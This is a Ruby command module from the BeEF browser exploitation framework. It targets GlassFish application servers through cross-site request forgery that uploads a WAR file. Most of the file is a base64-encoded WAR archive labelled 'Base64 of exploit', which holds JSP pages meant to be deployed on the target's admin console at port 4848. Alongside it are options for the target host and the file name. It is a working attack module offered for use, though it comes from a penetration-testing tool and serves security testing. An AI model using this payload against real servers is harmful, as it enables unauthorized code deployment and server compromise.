#
# Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Glassfish_war_upload_xsrf < BeEF::Core::Command
  def self.options
    [
      { 'name' => 'restHost', 'ui_label' => 'Host', 'type' => 'textarea', 'value' => 'http://glassfishserver:4848', 'width' => '400px', 'height' => '25px' },
      { 'name' => 'warName', 'ui_label' => 'Filename', 'value' => 'hello.war', 'type' => 'textarea', 'width' => '400px', 'height' => '25px' },
      { 'name' => 'warBase', 'ui_label' => 'Base64 of exploit',
        'value' => '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', 'type' => 'textarea', 'width' => '400px', 'height' => '800px' }
    ]
  end

  def post_execute
    content = {}
    content['result'] = @datastore['result']
    save content
  end
end